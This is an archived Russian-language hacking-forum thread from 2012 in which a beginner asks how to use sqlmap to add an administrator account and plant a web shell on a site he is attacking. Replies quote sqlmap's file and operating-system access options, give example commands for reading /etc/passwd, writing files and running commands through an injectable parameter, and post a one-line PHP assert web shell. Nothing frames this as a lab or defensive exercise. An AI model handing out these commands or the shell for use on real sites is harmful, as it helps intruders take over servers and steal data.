RDot

RDot (https://rdot.org/forum/index.php)
-   Оффтоп/Offtopic (https://rdot.org/forum/forumdisplay.php?f=12)
-   -   sqlmap пару вопросов (https://rdot.org/forum/showthread.php?t=1969)

Shadowfolder 01.02.2012 06:47

sqlmap пару вопросов
 
Всем доброго времени суток.Не судите строго, но как в sqlmap добавить данные?
есть бд: earth
есть table: administrator
есть columns:
Код:

username
password

как добавить в table под именем admnistrator админа с юзернеймом Josh и пассвордом qwerty?

плюс есть ещё один вопрос:как добавить шелл через sqlmap?я знаю можно узнать хэш>расшифровать>подключит ся к mysql и добавить оттуда, но данный способ не доступен.

madnet 01.02.2012 11:43

sqlmap, на сколько помню, не предоставляет функционала для внедрения записи, да и крайне редко это удается в sql инъекциях, можешь попробывать вручную составить запрос, используя
Цитата:

--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
Для получения шела, при достаточных правах можно использовать запись в файл, либо исполнение команд, для этого есть ключи
Цитата:

File system access:
These options can be used to access the back-end database management
system underlying file system.

--file-read=RFILE Read a file from the back-end DBMS file system
--file-write=WFILE Write a local file on the back-end DBMS file system
--file-dest=DFILE Back-end DBMS absolute filepath to write to

Operating system access:
These options can be used to access the back-end database management
system underlying operating system.

--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process' user privilege escalation
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory

Shadowfolder 01.02.2012 13:54

я новичок в sqlmap-e...
я читал то, что тут запостили, но мне нужен пример...кто работал, дайте примеров пожалуйста...

madnet 01.02.2012 14:33

В двух словах
sqlmap -u "http://...?id=" --file-read="/etc/passwd" - чтение файлов
sqlmap -u "http://...?id=" --file-write='/var/tmp/1.txt' --file-dest='/tmp/1.txt' - запись файла, где file-write - файл на твоей машине, file-dest - куда сохранить на удаленной
sqlmap -u "http://...?id=" --os-cmd=ls - выполнить команду, скрипт запросит пути куда лить оболочку, его тип и т.д.

Для новичка удобно запускат скрипт
sqlmap --wizard
тогда по шагам он будет запрашивать необходимую информацию

Shadowfolder 01.02.2012 17:16

Спасибо!Когда пытаюсь записать файл, то выйёт ошибку [WARNING] the injection is on a GET parametr and the file to be writen hexadecial value is 132218 bytes, this might cause errors in the file writing process
как решить эту проблему?

Raz0r 01.02.2012 17:53

файл слишком большой, в GET-параметр не поместится. Решение: либо заливать файл поменьше, либо использовать инъекцию в POST-параметре.

Lostnull 01.02.2012 17:54

Shadowfolder Как бы намекает, что сунуть 130 килов не есть гуд, пробуй лить мини шелл например
Цитата:

<?assert($_REQUEST[blabla]);?>

Shadowfolder 01.02.2012 18:12

как так, ведь мой шелл весит всего 65 килобайт...
что за мини шелл, подскажите

Raz0r 01.02.2012 18:51

все же попытаюсь
Цитата:

Сообщение от Shadowfolder (Сообщение 23448)
как так, ведь мой шелл весит всего 65 килобайт...

65 килобайт так же не влезут в GET-параметр, web-сервер не примет такой запрос, максимум можно отправить 4 кб.
Цитата:

Сообщение от Shadowfolder (Сообщение 23448)
что за мини шелл, подскажите

Написали же <?assert($_REQUEST[blabla]);?>

lefty 01.02.2012 19:11

Shadowfolder

Цитата:

как добавить в table под именем admnistrator админа с юзернеймом Josh и пассвордом qwerty?
это возможно, если у тебя иньекция в insert/update запросе, либо субд на которой все бегает поддерживает stacked queries.

уверен что это так в твоем случае ?


Часовой пояс GMT +3, время: 13:59.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot